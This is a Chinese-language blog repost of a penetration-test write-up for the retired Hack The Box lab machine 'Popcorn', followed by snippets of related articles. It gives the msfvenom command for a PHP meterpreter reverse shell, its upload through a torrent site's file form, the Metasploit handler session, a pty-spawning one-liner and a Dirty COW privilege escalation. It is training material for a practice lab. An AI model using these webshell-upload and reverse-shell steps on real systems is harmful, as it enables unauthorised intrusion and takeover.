HTB: Popcorn渗透测试

最新推荐文章于 2023-12-04 19:19:53 发布
最新推荐文章于 2023-12-04 19:19:53 发布
阅读量598 收藏
点赞数
文章标签: 网络安全 web安全 系统安全 经验分享 数据挖掘
原文链接:https://www.freebuf.com/articles/web/264850.html
版权

网络安全,web,Kali,渗透测试相关课件,工具,资料

可以关注公众号:“掌控安全课堂

回复:“我想学黑客”即可免费获得

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/4
描述:


注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,首先对该靶机进行探测,获取端口与版本信息根据各个开放端口的版本,通过目录扫描爬取到网页管理界面,通过文件上传木马文件,最后利用脏牛提权获取root权限。

一、信息收集

1、靶机ip

ip地址为:10.129.106.162

2、靶机端口与服务

nmap -sV -A -O 10.129.106.162

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))

3、网站信息收集

进入80端口查看前端源代码没有发现可利用的信息
 

通过dirb进行目录扫描获取到两个有用的网页

http://10.129.106.162/test                                                                     
http://10.129.106.162/torrent/  

(1)通过第一个链接获取相应的系统版本信息
查看PHP版本与信息

(2)第二个链接是一个登录页面并且可以上传文件
我们可以申请一个新的账号进行登录尝试上传

二、漏洞探测与利用

注册账号,尝试文件上传

首先需要上传一个torrent文件
随意在网上下载一个即可
编辑torrent上传脚本本文件
生成脚本文件

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.57  LPORT=4444 -f raw > shell.php

使用burp修改脚本信息,进行上传

成功上传,进入相应目录下查看是否上传成功
发现名称被更改但是不影响利用
使用msf进行连接

msf6 > search php/meterpreter_reverse_tcp

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/php/meterpreter_reverse_tcp                   normal  No     PHP Meterpreter, Reverse TCP Inline


Interact with a module by name or index. For example info 0, use 0 or use payload/php/meterpreter_reverse_tcp

msf6 > use payload/php/meterpreter_reverse_tcp
msf6 payload(php/meterpreter_reverse_tcp) > show options 

Module options (payload/php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf6 payload(php/meterpreter_reverse_tcp) > set 10.10.14.57
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf6 payload(php/meterpreter_reverse_tcp) > set LHOST 10.10.14.57
LHOST => 10.10.14.57
msf6 payload(php/meterpreter_reverse_tcp) > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 10.10.14.57
LHOST => 10.10.14.57
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > exploit

获取shell

三、提权

1、获取交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2、发现user.txt

3、脏牛提权

发现sudo -l命令无法使用
uname -a 查看内核版本

发现可以使用脏牛提权
执行成功

4、获取root.txt

总结

因为对msf使用的不是特别熟练,所以在反弹shell的时候遇到了一些问题,建议遇到不会的就进行谷歌自己动手找得到的永远比别人直接告诉自己的要印象深刻。

本文作者:一只xiao白, 转载请注明来自FreeBuf.COM

Askshhbs
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB Popcorn[Hack The Box HTB靶场]writeup系列4
重新启程
02-02 4500
本题是retire的第四题Popcorn 目录 0x00 靶机情况 0x01 扫描端口 0x02 web目录文件扫描 0x03 get webshell 0x04 提权 0x00 靶机情况 本题是linux的靶机,整体看起来难度在3-4之间,比之前的题目有了一些难度,不过做过vulnhub的题目之后,linux的题目基本上怎么做都心里有数了。 0x01 扫描端口 先看下端口...
HTB-Popcorn
TA不懒,但还没有添加简介
04-03 461
HTB-Popcorn
Metasploit***技巧:后***Meterpreter代理
weixin_34413103的博客
01-22 664
前言Metasploit是一个免费的、可下载的***测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施***测试。它本身附带数百个已知软件漏洞的专业级漏洞***测试工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为***,每个人都可以使用***工具来测试那些未打过补丁或者刚刚打过补丁的...
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1117
HackTheBox Active Directory 101 Forest
Meterpreter 提权
eli的博客
05-20 2169
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
htb:破解盒子的演练
01-31
htb 破解盒子的演练
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
30 天渗透测试练习2.pdf
10-06
7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的虚拟机,用于提升渗透测试技能。例如Pilgrimage、Topology、PC、Busqueda等,每个机器都有不同的攻防挑战。 8. **基于路由的SSRF(Server-Side ...
HTB打靶日记:Stocker
01-15
hackthebox
vagrant-htb:HackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
php如何检测在另一台设备登录怎么做_如何使用Metasploit的Web Delivery Script和命令注入弹出Shell(翻译)...
weixin_39950010的博客
12-13 158
Web交付概述Metasploit包含一个有用的模块,它在你的的设备上创建的服务器上承载一个负载。一旦目标设备连接到服务器并执行负载,就会运行web交付脚本。这个模块是通用的,因为它可以面向Python、Powershell和PHPapplications。web递交脚本的主要优势是隐藏。服务器和负载都驻留在你的设备上,因此在执行攻击时,不会将任何内容写入目标的磁盘,从而降低了触发防病毒应用程序和...
12.1、后渗透测试--提权
无痕的博客
12-13 732
meterpreter后渗透阶段提权
oscp——HTB——Popcorn
王嘟嘟的博客
05-09 525
0x00 前言 难度 入门2级 0x01 信息收集 这里开放了22和80 0x02 Web——Webshell 看到这里是一个test,果断扫目录。 拿到目录: http://10.10.10.6/test http://10.10.10.6/torrent/ 先看一下test,phpinfo的界面 访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号 然后上传一个torrent 然后这里上传成功 这里上传文件,并使用burp拦截,并且修改
hack the box Popcorn
nini_boom的博客
06-02 628
进入hack的世界不能自拔 1、信息收集 nmap -sV -sC -A -Pn -oN 10.10.10.6.txt 10.10.10.6 2、尝试 msf启动,apache httpd2.2.12尝试了一波payload,但是都没有达到理想的结果。 于是想扫描下10.10.10.6的网页目录 我使用的是macOS,不知道用啥扫描工具比较好。 好吧,Dirbuster和我之前想用的工具...
黑客入门,从HTB开始
热门推荐
neal1991的专栏
10-20 4万+
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场。 之前在 HTB 也玩过一些机器。里面的机器难度有好几个档次,insane 难度的一般都是极其困难的,这种机器一般让我对着大神的 Writeup 我可能都没有办法复现出来。之前也有在公众号上分享过几篇 H...
HTB】HackTheBox-medium-Popcorn 国外渗透实战靶场
学习记录!大佬速速离开
04-14 3236
Majority Papers为笔者学习所整理的内容,本意希望借此知识输出方式达到筑牢基础的效用。如若有不足之处,还望大哥哥海涵。向值得学习的人学习,向前辈们致敬! 🌑🌕暗黑模式,解锁加倍沉浸式阅读快乐🥤 🦾祭神器--Nmap ┌──(root💀kali)-[/home/kali/桌面] └─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.6 ​​​​​​ Nmap scan report for 10.10.10.6 Ho...
msf出现[-] Unknown command: db_hosts错误
Shanks@CSDN
08-26 7734
笔记:Metasploit, The Penetration Tester's Guide 内容:msf出现[-] Unknown command: db_hosts错误 在Msfconsole中使用db_hosts命令出现如下错误: [-] Unk
Meterpreter提权详解
devil8123665的博客
12-06 1624
转载https://www.cnblogs.com/backlion/p/9484950.html 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/me
Metasploit的提权和后渗透
最新发布
Kali与编程
12-04 1528
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit的提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值